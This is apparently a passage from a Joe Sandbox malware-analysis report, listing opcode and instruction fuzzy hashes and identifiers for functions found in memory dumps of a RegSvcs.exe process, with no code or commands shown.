                                                                                              • Opcode Fuzzy Hash: 1a1f453f6ed5ec8010c34d3465837f934482469adcc4d7d7809aab4ae520bf35
                                                                                              • Instruction Fuzzy Hash: 97718070D01205EFDF20DF99DA60A9EBBF8FF85300F11419AEA90EB258C73A8945DB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a95c35015c57bce891dcc3ab20abae94debd46c37dc14d44fe823ca66d9825f4
                                                                                              • Instruction ID: 40a1b7aa19e7e1a4071e1d0490ef05080994eacc7c2a8f55cc9e8ee9226594a3
                                                                                              • Opcode Fuzzy Hash: a95c35015c57bce891dcc3ab20abae94debd46c37dc14d44fe823ca66d9825f4
                                                                                              • Instruction Fuzzy Hash: C771E272A046469FC751DF28C480B7AB7E5FF84310F0485AAE998CB362EB38DC45DB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                              • Instruction ID: 2033b522c2298fc990bbaef6838da57cb8a053dc24c914cbf755203db9a2af7b
                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                              • Instruction Fuzzy Hash: 40714C71A00619EFDB10DFA9C984AEEBBF9FF48700F104569E645EB251DB34EA41CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 68249984a02f9eb9e67cad37b24dd4ac5157b94d81f17e2364085bbf5d9693e3
                                                                                              • Instruction ID: 2127cd69d5d0ebee926240588f1231fbdf31946f500607f6c6e3a8a88f71bdf9
                                                                                              • Opcode Fuzzy Hash: 68249984a02f9eb9e67cad37b24dd4ac5157b94d81f17e2364085bbf5d9693e3
                                                                                              • Instruction Fuzzy Hash: 67710531600B01AFFB32DF58C844F6ABBF6EF44720F148458E696872A1DB76E944CB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 045009ca4af679359ac7416b4727475b3741d50c32a40483e048aaaa82493906
                                                                                              • Instruction ID: eee04bcecddca86581b4a5882414eae72a0eb404ea2288b11ed45883b03a5e99
                                                                                              • Opcode Fuzzy Hash: 045009ca4af679359ac7416b4727475b3741d50c32a40483e048aaaa82493906
                                                                                              • Instruction Fuzzy Hash: 3A8101B2B05345CFDB24CF98E584BAD77F2BF88310F1541A9E944AB291CB399D01DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cd8e6984c7bb816967b46e576808f50b4244bfc33022a3e3cae3b1ad35ebec3b
                                                                                              • Instruction ID: f5367c5f7f35de6836b020400cc353bacee9228c45f414c0c4f5ed47921db18e
                                                                                              • Opcode Fuzzy Hash: cd8e6984c7bb816967b46e576808f50b4244bfc33022a3e3cae3b1ad35ebec3b
                                                                                              • Instruction Fuzzy Hash: D751C172604712EFDB11DE68C894F5BBBE8EBC8750F014529BA90DB150DB31DD04CBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 69c487f1feeb81bf5a122a2705ce294edc045ff92be54652f24c3b04d372105f
                                                                                              • Instruction ID: e9bfd458a38e4a4716831cfdcc3c4915b1d5e47d7ec02518bca27cf23804aa58
                                                                                              • Opcode Fuzzy Hash: 69c487f1feeb81bf5a122a2705ce294edc045ff92be54652f24c3b04d372105f
                                                                                              • Instruction Fuzzy Hash: C051F171904709DFD721EF9AC880AABFBF9BF54710F50861EE2D2576A1CBB0A941CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4f7b964dfbb98b67f42188645f56f66a69931b39ab278405ba4454a6024f1bf6
                                                                                              • Instruction ID: ef5ab607b72901d0322a3273dcc81811357e6ec576b245e458d81dc6ed6f78be
                                                                                              • Opcode Fuzzy Hash: 4f7b964dfbb98b67f42188645f56f66a69931b39ab278405ba4454a6024f1bf6
                                                                                              • Instruction Fuzzy Hash: F6516171640615DFCB62EFA8C990EAAB7FDFF04784F4104A9EA8297661D738ED40CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 957871aa7faf292f3df96986e4d607087c095eae8c788f06b0fe066696a96b24
                                                                                              • Instruction ID: ad0482a0d7f82d398b536fcae5982877436a4806ee908f7a58beaa44f4379a04
                                                                                              • Opcode Fuzzy Hash: 957871aa7faf292f3df96986e4d607087c095eae8c788f06b0fe066696a96b24
                                                                                              • Instruction Fuzzy Hash: 0B5189716083029FD754EF29C880A6BBBE5BFD8204F44892DF5C9C7250EB30D905CB96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                              • Instruction ID: cdb56877cc9c9eb3452bebce302b07a14783407af43e789b1cf8e39e1abdfd20
                                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                              • Instruction Fuzzy Hash: 2951A571E0021A9BEF16DF94C840BEEBBB5BF49350F0440A9EA45EB280D774DD44CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                              • Instruction ID: 6f90c451a72a6cce90f3664872cd90747813eb78beea6121bf341688dfe1cd32
                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                              • Instruction Fuzzy Hash: 8751A635D00319EFEF21DF94C884BAFBBBDAF00324F154665D69267191D7349E448BA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c7691c7a546ea33829dde6b907b4b3f6c35aaf8a48c20c93bf3e5c7f45018269
                                                                                              • Instruction ID: 0eb604366d88dd786eb8211fb311d2aa6b57f5d21821b5068850332c39141024
                                                                                              • Opcode Fuzzy Hash: c7691c7a546ea33829dde6b907b4b3f6c35aaf8a48c20c93bf3e5c7f45018269
                                                                                              • Instruction Fuzzy Hash: 6D4108707016059BD769DBADC894BBFBBDAFF90621F88C25AE9D587280DB30D801C790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 33ef0425ff8cd62cfec966a8b6fc8a5df36deb4eb139cec9db9baaa149372d15
                                                                                              • Instruction ID: 91eb6f7132f812502aa0874d19b946525e7a8844892865db02c429ef0d36e273
                                                                                              • Opcode Fuzzy Hash: 33ef0425ff8cd62cfec966a8b6fc8a5df36deb4eb139cec9db9baaa149372d15
                                                                                              • Instruction Fuzzy Hash: 0B519D71900219DFDB60DFA9CA809AEBBF9FF48358B144559E9C5A3305DB39AD01CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              • Instruction ID: 72e1955fc8b05631cc43181663d1f57b5b6e59515f0b313c5504b9a052477775
                                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                              • Instruction Fuzzy Hash: 12312A32A04248AFDB219B68CC80BEABFE9EF44350F0441B5F855D7363C678D984DBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ef6a11320103950fc8469f230d2d89c8c25b74614335ab85e0dc51426bf89a52
                                                                                              • Instruction ID: e5280812267840b1d7543cccaeef876a845a9e79d358cb1274a6337ae6103f81
                                                                                              • Opcode Fuzzy Hash: ef6a11320103950fc8469f230d2d89c8c25b74614335ab85e0dc51426bf89a52
                                                                                              • Instruction Fuzzy Hash: 1D31CA3174071AABE722AF69CC41FAF7AA5AF48B50F100029F644AB2D1DFA5DD00D7E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 995c31e60a2ebc0eb480784ebcdb60bd24d05573563b3a504e27c6f0239023aa
                                                                                              • Instruction ID: f1d6e6c0eb9f170823578f898f6f9cd3bd0a4d5df2756a43711f5c0ac30351ff
                                                                                              • Opcode Fuzzy Hash: 995c31e60a2ebc0eb480784ebcdb60bd24d05573563b3a504e27c6f0239023aa
                                                                                              • Instruction Fuzzy Hash: 8D31C1726052048FCB61DF1DD9A0E6AB7F5FF84360F0A44ADE9D5CB251D732A802EB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c16eaa5de7423748c3eb8fc8fee8ae75d1e7024238538e5b82ed29892308fbb7
                                                                                              • Instruction ID: a54ec291a6c3b23fad1226673a653b2e79586db48edbaf50daf5c572d527058d
                                                                                              • Opcode Fuzzy Hash: c16eaa5de7423748c3eb8fc8fee8ae75d1e7024238538e5b82ed29892308fbb7
                                                                                              • Instruction Fuzzy Hash: 1B41DD72200B458FC722CF29C981BD67BE8BF08350F10846DFAA99B291C774F800EB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ca581e5a46ef02a9b1c170dc75a4e6dce4e6965fe741126622a0e55b8a9d6d3f
                                                                                              • Instruction ID: 547c7e8ddd0903acd37f786dc9342853b3d0fb88db4386bf3db76356f204b484
                                                                                              • Opcode Fuzzy Hash: ca581e5a46ef02a9b1c170dc75a4e6dce4e6965fe741126622a0e55b8a9d6d3f
                                                                                              • Instruction Fuzzy Hash: 7031BEB16042458FDB60DF28D9A0A6AB7E5FB84310F09456DF9D4CB391D730E806DB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b9d85d2df2db1bc922282f5cb3352613546b37d964e29d0f7ea6c7a07b162003
                                                                                              • Instruction ID: a4dc4ac96fd58a9845b38407f3fc26fb0b843bc68f216457a5b9047f9f4ce241
                                                                                              • Opcode Fuzzy Hash: b9d85d2df2db1bc922282f5cb3352613546b37d964e29d0f7ea6c7a07b162003
                                                                                              • Instruction Fuzzy Hash: E031C3317416899BF3A2975CCD48B6BBBD8AF40740F1900E0BFC58B6E2DB68DA41C220
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3ab323a25c05b1489fca30f4bf3e591442d277a3020be4b373257403cf0006c3
                                                                                              • Instruction ID: 7c04a1b0339aecc528a8664b7ce2e13ced5c593e95549ef390fc92d3d1900abd
                                                                                              • Opcode Fuzzy Hash: 3ab323a25c05b1489fca30f4bf3e591442d277a3020be4b373257403cf0006c3
                                                                                              • Instruction Fuzzy Hash: A731C475A0051AABDB15DFD8CC40FAEB7B5FB44B40F454169E940EB244D771ED40CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42587f10062d9cf6c0ea50ebcb9be1a0a323122f477c0c152272db9cefaaa80e
                                                                                              • Instruction ID: 30943014133f20e10e6c24c33209984011e71185ac5ea52023459f69d352ed3a
                                                                                              • Opcode Fuzzy Hash: 42587f10062d9cf6c0ea50ebcb9be1a0a323122f477c0c152272db9cefaaa80e
                                                                                              • Instruction Fuzzy Hash: B0317376A4012DABCF71EF54DC84BDEBBF5AB98350F1100E5E588E7250DA349E918F90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 61e4cda987b57f52ef1b2936d6f8002c9e1a1607f6ab005fea929d0098b91180
                                                                                              • Instruction ID: be21fda32469062f1c86851fb513b83d55db5522b2e97bb3333a3914a4a35ca0
                                                                                              • Opcode Fuzzy Hash: 61e4cda987b57f52ef1b2936d6f8002c9e1a1607f6ab005fea929d0098b91180
                                                                                              • Instruction Fuzzy Hash: AB31C872E00615AFEB22DEA9CC40AAFBBF9EF44750F014465E595E7290D6749A008BA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 44641f06f34d08409950c8856e51a69578ec0c4ddcf08e1c9179640cc6402309
                                                                                              • Instruction ID: 578f4f7974a4c956cae5848cfc3b0a10aa7b6d26d27056fa1915b2a595f7cf8d
                                                                                              • Opcode Fuzzy Hash: 44641f06f34d08409950c8856e51a69578ec0c4ddcf08e1c9179640cc6402309
                                                                                              • Instruction Fuzzy Hash: 0B31E271A00605ABDB129FE9CC50A6FBBF9AF44750F484069E681DB352DA36ED008B90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c7dbcee1be0d88c606a87fc3ba0022dcc0afb89cf941972fecd7c9ae08206739
                                                                                              • Instruction ID: 091cb2de9be956a6d8c43c5b7f602773fad51e845a3687416c288126e01d9090
                                                                                              • Opcode Fuzzy Hash: c7dbcee1be0d88c606a87fc3ba0022dcc0afb89cf941972fecd7c9ae08206739
                                                                                              • Instruction Fuzzy Hash: 18313332A04396DBC712DE26C880E6BBBE5AFD4360F054529FC85AB311DE74DD41A7E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 02e6dcffa691451faffe0a24e124fdb6e23a90548fd4bc522e3418584501d14f
                                                                                              • Instruction ID: 76d6add47c31b2c3a2c7632500ea66755f86aedc94642880f564bd343920f78a
                                                                                              • Opcode Fuzzy Hash: 02e6dcffa691451faffe0a24e124fdb6e23a90548fd4bc522e3418584501d14f
                                                                                              • Instruction Fuzzy Hash: 36318DB16053418FE360DF19D880B2AB7E5EF88750F0849ADF98897251DB71EC44CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                              • Instruction ID: cc548991c0e34359c4229bd87484850e428103e18cd62554bf71dfa3c7843259
                                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                              • Instruction Fuzzy Hash: D4314AB2B01B41EFD7A1CF69DD40B67BBF8BF08A50F04096DA59AC3650E634E9008B60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: af822b0b5c4435a27c6b6bf6f1696f3b3412c9de395890edf5f6f61c7bfbf987
                                                                                              • Instruction ID: 9d6fcffa9661ab8375597e9b042dac62bb14b10d780e1572642c935dec8a3d74
                                                                                              • Opcode Fuzzy Hash: af822b0b5c4435a27c6b6bf6f1696f3b3412c9de395890edf5f6f61c7bfbf987
                                                                                              • Instruction Fuzzy Hash: EA319AB19093099FCB21EF19C94086ABBF1FF89314F0549AEF4C89B252D331D946CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c3f223e5f6ec83431b90edc3888509db9f6ad826f6d94f0190bf631a5f7c36b
                                                                                              • Instruction ID: 18690f16ece0d8d9f779bdd144954e4707e3fafeaea4c5a94957caa70970e0b6
                                                                                              • Opcode Fuzzy Hash: 7c3f223e5f6ec83431b90edc3888509db9f6ad826f6d94f0190bf631a5f7c36b
                                                                                              • Instruction Fuzzy Hash: 7A310571B003059FE721EFB8C981AAEBBF9EF84304F018529D685D3291DB35E941CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                              • Instruction ID: b7b5e8d169dfa33aa7bff67073b496371d92bcd5c54f205867ffb36cd8a87d72
                                                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                              • Instruction Fuzzy Hash: 2A210B32F4125BAAD7119BB58801BAFBBBAAF44750F198176AE95F7340E370D900D7E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 10e24e8f2e5949f94de27a25a4d34f5c3142b8cc0b742624ec25b6f8bf3f4348
                                                                                              • Instruction ID: d92ebef3b01251c972e66fdde3c6e2f1daf34133eceecdb629d0bbff12494a1a
                                                                                              • Opcode Fuzzy Hash: 10e24e8f2e5949f94de27a25a4d34f5c3142b8cc0b742624ec25b6f8bf3f4348
                                                                                              • Instruction Fuzzy Hash: 2E1104723001199FDB1ADB28CD81A6F7297EFC5370F254979EA62DB291E9319802C690
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ef2a3470fceeff006879be1c5cb22e3d566e007c66301e0423f44192bd0fcc72
                                                                                              • Instruction ID: 28b3a80e19b6813acba483259ee661a58bec88bfc5c07e763d4672aa61e61699
                                                                                              • Opcode Fuzzy Hash: ef2a3470fceeff006879be1c5cb22e3d566e007c66301e0423f44192bd0fcc72
                                                                                              • Instruction Fuzzy Hash: E011E376A01208DFCB65CF59DD80A5ABBF4FF84710B0640BDE9859B319E6B9DD00DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                              • Instruction ID: 26c59ee47454a9459897829d99f478ebe6122a362bcf88cca811e6d65b362cb5
                                                                                              • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                              • Instruction Fuzzy Hash: 1C110436A00909EFDB19CB98CC11B9DBBF5EF84310F058269E88597380E675EE01CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                              • Instruction ID: 7495c763a508cfe0ccc97efa017fab5166c7142ab7f0dd8855c513106f8fb68c
                                                                                              • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                              • Instruction Fuzzy Hash: 1F2106B5A00B459FD3A0CF29D481B52BBF4FB48B20F10492EE98AC7B50E771E854CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                              • Instruction ID: 8b3df985b80004f031c038eb471a661c0a3367890205fab17b1cc57e8fdc481d
                                                                                              • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                              • Instruction Fuzzy Hash: 0E119E3A600700EFEB61DF49C840B5ABBE9EF45750F058469FA8D9B160DB75DD40DBA0
